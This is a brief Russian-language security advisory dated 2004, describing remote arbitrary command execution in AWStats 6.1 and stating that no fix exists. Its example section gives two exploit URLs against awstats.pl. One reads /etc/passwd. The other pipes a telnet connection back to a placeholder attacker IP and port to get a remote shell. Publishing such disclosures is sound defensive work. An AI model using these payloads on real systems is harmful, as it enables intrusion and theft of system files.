Удаленное выполнение произвольных команд в AWStats

Дата публикации:
21.08.2004
Всего просмотров:
1948
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: AWStats 6.1

Описание: Уязвимость в AWStats позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Пример:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>

URL производителя: http://awstats.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: AWStats

или введите имя

CAPTCHA